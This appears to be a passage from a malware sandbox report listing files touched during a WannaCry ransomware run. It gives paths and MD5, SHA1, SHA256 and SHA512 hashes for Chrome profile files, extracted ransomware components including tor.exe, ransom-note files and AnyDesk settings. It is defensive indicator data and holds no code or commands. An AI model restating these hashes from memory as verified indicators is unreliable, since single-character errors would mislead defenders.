| SHA512 | 569d10cececd66cac1d6bee9e29dff3e074b8494b33917d6fc47c67bb2128bdeccd202beda5be9bb7c46bbba15f196c1845aa2b22a1d42f6abf19278c41bd5b4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 087f3629d9379281e693d4a7b749deac |
| SHA1 | 11b3004f9062cd06e316a16f7c88a4183f12a1c1 |
| SHA256 | 5f6d696afef08e55699db1d52d3572d33456fb7da478025354187c52c5f9400e |
| SHA512 | 4420bf26b46c7037d9d4fb5f89f58338eb50ecb9d5bc8257b1d30744560d51b6387cb1c495a771c51d2386e8fd9ee11416ab42e2349c4b010fecebad6706be61 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8a4ca4ecc6b0f7e6d65c40f377cf7ce6 |
| SHA1 | 21d27ff380df8545dfdd18179ef4376f2e85b2df |
| SHA256 | 519e101e7ff00d19ab6945858c23f9d4ce31da322dd67bdaca0aa7abd613f7c9 |
| SHA512 | 1df1290078463924df3f4e9151dff09bfda3d731478fb8fe47a7d08692d2343b2d3462f65ecd73e62cd1fb6fca945e270b587c536576eaef88b3021b1b223152 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_0000d9
| MD5 | efe76bf09daba2c594d2bc173d9b5cf0 |
| SHA1 | ba5de52939cb809eae10fdbb7fac47095a9599a7 |
| SHA256 | 707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a |
| SHA512 | 4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 461d490fe37280aff97db0dc6dc6470a |
| SHA1 | d643b05769b3231600831a42baea02bf25a551f9 |
| SHA256 | aaca633df44fccd0d8a33ca1d83e3fef97726e757053696b3ce2cf60347c7099 |
| SHA512 | 13142ed3fb7757d40ca02e9e599a964a8573098e1b79d9a7d741c94dfdc7d63870b9a4c7eb5a893c38af172c822f2125cfa307856f894943e671e6d1dd48d114 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b3cbead96152be6da28079d75bba9e76 |
| SHA1 | b51055c6ea72d31d3e8ce7f9912934afbe87b2c5 |
| SHA256 | e53923b4040894a157bfea9655e28a1f54ebf372b263b52847a29e048aa84782 |
| SHA512 | a0592342df3c92ec95a0025fe06d16f34e713263d77fbdf1c49c9f6ad6b056da79d1ef81108f5b0be09fd635068a822cc0ac1d52370b04b4a2d3add7a0fbcedc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 87c0d6c888d8a1e76aa8f235473580eb |
| SHA1 | 2a643daa9c9815dc4193f3e69c84b549f59e15cd |
| SHA256 | a35e784ff08ddb7374bcaf071d04f3af27f755f18f948edab9ada57dc6add837 |
| SHA512 | b0dea11fdc05728baaf491f130bc90a34301bbcdecb92d0bc94b1bf5e8b5fd32e8e2d60d00acdbac6dae5430ac74b51b14b38848c1705eafddb304bd42c2986d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a70191c4d0946b96b5fc455a921f3725 |
| SHA1 | fb6e16d5a5a2fa3fd95dab595aee32e67d1a026f |
| SHA256 | 997368ea1666d75d51674ebd3fb30bb7fe2266d65e230804db3a7c575fdf7ce1 |
| SHA512 | ce4c27a38062784f785599e0bc67d91ee0275153fddee7ab363da1413f46fd9f731ee52c25da994b73a9d9fe1f466380b5b29b72e3433f1216b6e22296c51c5c |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry
| MD5 | 35c2f97eea8819b1caebd23fee732d8f |
| SHA1 | e354d1cc43d6a39d9732adea5d3b0f57284255d2 |
| SHA256 | 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e |
| SHA512 | 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
| MD5 | 7bf2b57f2a205768755c07f238fb32cc |
| SHA1 | 45356a9dd616ed7161a3b9192e2f318d0ab5ad10 |
| SHA256 | b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25 |
| SHA512 | 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
| MD5 | 7a2726bb6e6a79fb1d092b7f2b688af0 |
| SHA1 | b3effadce8b76aee8cd6ce2eccbb8701797468a2 |
| SHA256 | 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5 |
| SHA512 | 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54 |
C:\Users\Admin\AppData\Roaming\AnyDesk\@[email protected]
| MD5 | 4e0fed28f345f57dc0ab584d9f8e8f4d |
| SHA1 | 65bca20f15a40b3d0e6bcb941daba6bbe0371eca |
| SHA256 | 3424234bce57fc9c78cf6259db5b1109e4fcd334cdb54f0faa093148d80bb3d8 |
| SHA512 | 0b2141c67abff7697adb62954c92f8238bcdc456c6ecd267a20cd8b5dbb4272716474d1de258bf1592f8aeb9c69c1198cd294cf1375a098f680794dabf668bbe |
C:\Users\Default\Desktop\@[email protected]
| MD5 | c17170262312f3be7027bc2ca825bf0c |
| SHA1 | f19eceda82973239a1fdc5826bce7691e5dcb4fb |
| SHA256 | d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa |
| SHA512 | c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe
| MD5 | fe7eb54691ad6e6af77f8a9a0b6de26d |
| SHA1 | 53912d33bec3375153b7e4e68b78d66dab62671a |
| SHA256 | e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb |
| SHA512 | 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f |
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
| MD5 | b191c5d5577c49e25a795eade00f5eac |
| SHA1 | f8e7dbe94b1b186f21d2fdfbcff8b078592992b1 |
| SHA256 | 4568864614fe32e0560952aabb7c7d6407330d626eacdf65527b96022bede6b4 |
| SHA512 | d4a5ee8ef7ef30f27e54c99796ea876d3f9bb4025e231867bd972c70f34e8329cfeb575732fbdbf8f743363a204dacf0e104e87c4246f5bc370e72adc2bf2dab |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6133c395972029cd8ad543ad63256101 |
| SHA1 | 5a980957b255ffca298c85f64cd8259e8df3cc8d |
| SHA256 | cd0cb617a1e566e7cf98b18c0c227b5395d7ce93847cc7e39fb7057299a5d562 |
| SHA512 | 4b2d3c15a4ce19f848a7ee446172c50c87f2fda81c14fd73f7b614a11f00645f6fc981003c8282f71694ca6de463641499a7072596d5ab8394f97a430da8339c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 577806eae3b192c567939ae5f08c34b5 |
| SHA1 | 39f2cb5a95e540b4ea79f2533547d65830595529 |
| SHA256 | 2965723d5a54d6a809962554b28bfc81006d2307cd39456b5bd6e3695c6e415d |
| SHA512 | 11351e41625bbcef88d8b7b92af27524b5647a84f5dffefa2e94d98e32e82c7fe3f20bad4b103e3f4247ec3dccf14309c5c2772e8e2f186b7e2807deaa7de25d |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 581601a9f1abe4b61631abf23d9be2df |
| SHA1 | b37d78e2ef16ca8523541dea9e3b6d6c7f4b35a1 |
| SHA256 | f4b967c20d25c3b2d3fd45a5e375c1717eba726592359323fcf4839eb2085f39 |
| SHA512 | bb2100295bc8e0f0e14060fb8b8361f85925b8af3b52dce70444414096377d0dbee188ead8cc3818884c38d19e519842f98407429e94c44bc4a5eba8e58ff87f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms
| MD5 | 75ae2fa3a75a711ff7176d52c9bcd01d |
| SHA1 | 618d9aae8e01ff123b1f6df215a18670c4271c98 |
| SHA256 | fcf002130a457b078596eb9b843cf718dd836644605dda7251ba2d7227d241ab |
| SHA512 | d01095cf30257326ada4922a586d8f9ec0728548d504b6a88054d1d7d8e1214e53ea4c889e0120f43cd2ca21cdf9c9c1bba82815cf74f218c31e9fb55b4b548f |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms
| MD5 | 17ae2ebb90e8a62d2530c76c6e62bb6e |
| SHA1 | 2b39d84c90dc40f70e2e605f783b5516a7bf696b |
| SHA256 | 8b6933e8581c5d8203d00567d0d8b48a9a1d165799b4b0b6400c704a71ca9ea5 |
| SHA512 | 00875291f77998ce2e84a6653c3df3ef01fc229794eeb07b98d30b115ffb0e2b15fc871f015aad9a47bb2b173deeaabce92faa605272741ebfd885eaa67b0918 |
memory/4784-4724-0x0000000000A34000-0x0000000001C6A000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
| MD5 | 0b7ac903f31e31fa2584ffe9f625c73d |
| SHA1 | 2a387946f02b7c4171b892728fe8d8791d2cf45f |
| SHA256 | 35c0df99ac7853c626b15afe1b2d6ea1149ea6ff350ae2ccb799f9f45485c084 |
| SHA512 | 3d0b97ad18e0a284ec50d7d0a80d5ee07fdd6e08bf893bc1fc025a485330d5984f7323d99ce832476489648bdc46461d9dd81c2a6c041f9d6a9c5932ab96b5fa |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json
| MD5 | 404a3ec24e3ebf45be65e77f75990825 |
| SHA1 | 1e05647cf0a74cedfdeabfa3e8ee33b919780a61 |
| SHA256 | cc45905af3aaa62601a69c748a06a2fa48eca3b28d44d8ec18764a7e8e4c3da2 |
| SHA512 | a55382b72267375821b0a229d3529ed54cef0f295f550d1e95661bafccec606aa1cd72e059d37d78e7d2927ae72e2919941251d233152f5eeb32ffdfc96023e5 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
| MD5 | 5eb6377ae328b6ecb63eba84dc6bfa7b |
| SHA1 | 6257a032d292ec15926f369e45169e44fd4e5bb6 |
| SHA256 | 835df66ecc1ebd62f467cdbf98a525fe13e29663443812250297e482dac8540d |
| SHA512 | a7c421aabe87d8b2d5508961889cede0cf1838af136e8798f6ba2dca3bcde42e1900628acb76dc7d28cd9680a4ca02071578c78d8e965375cbccb3368b71d967 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
| MD5 | 1ff5afbb5b7bdd60c60d41f883787615 |
| SHA1 | 9d8993750d23379bb71c80fc7b57466dddbe9b0e |
| SHA256 | 3e9a9c2ac4d3be979d87a31571be7364dc5b938773ec438b755c409f2e024da0 |
| SHA512 | 745492f4584bb0a1eee7840d9d5657bf69612384c47f491c4edb0fdc55bf7ad25eb2d91c628fd7b9d0ac80e59ffa24f8d1146751d4efffe5951ac9503d99e1ee |